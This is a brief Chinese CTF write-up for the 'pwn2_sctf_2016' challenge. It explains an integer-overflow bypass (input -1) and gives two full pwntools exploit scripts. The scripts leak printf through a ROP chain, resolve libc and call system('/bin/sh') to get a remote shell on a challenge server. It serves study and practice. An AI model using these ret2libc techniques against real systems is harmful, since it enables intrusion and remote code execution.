pwn2_sctf_2016（prinf libc）

一个整数溢出，注意get_n函数把a2转换为了unsigned int类型，但在vuln函数里面比较的是int类型


输入-1即可绕过
这里的libc是不是太老了都打不通

exp

from pwn import *
from LibcSearcher import *
io = remote('node5.buuoj.cn',29978)
elf = ELF('./pwn2_sctf_2016')
main = elf.sym['main']
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
io.sendline(b'-1')
payload1 = cyclic(0x2C+4) + p32(printf_plt) + p32(main) + p32(printf_got)
io.sendline(payload1)
printf = u32(io.recvuntil('\xf7')[-4:])
print(hex(printf))
libc = LibcSearcher('printf',printf)
libc_base = printf - libc.dump('printf')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
io.sendline(b'-1')
payload2 = cyclic(0x2C+4) + p32(system_addr) + p32(main) + p32(binsh_addr)
io.sendline(payload2)
io.interactive()

（一开始还以为是ret2syscall）

这个可以了，是libc-2.23.so

exp2

from pwn import *
from LibcSearcher import *
io = remote('node5.buuoj.cn',26690)
elf = ELF('./pwn2_sctf_2016')
libc=ELF('./libc-2.23.so')
main = elf.sym['main']
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
io.sendline(b'-1')
payload1 = cyclic(0x2C+4) + p32(printf_plt) + p32(main) + p32(printf_got)
io.sendline(payload1)
printf = u32(io.recvuntil('\xf7')[-4:])
print(hex(printf))
#libc = LibcSearcher('printf',printf)
libc_base = printf - libc.symbols['printf']
#system_addr = libc_base + libc.dump('system')
#binsh_addr = libc_base + libc.dump('str_bin_sh')

system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + libc.search(b'/bin/sh\x00').__next__()
io.sendline(b'-1')
payload2 = cyclic(0x2C+4) + p32(system_addr) + p32(main) + p32(binsh_addr)
io.sendline(payload2)
io.interactive()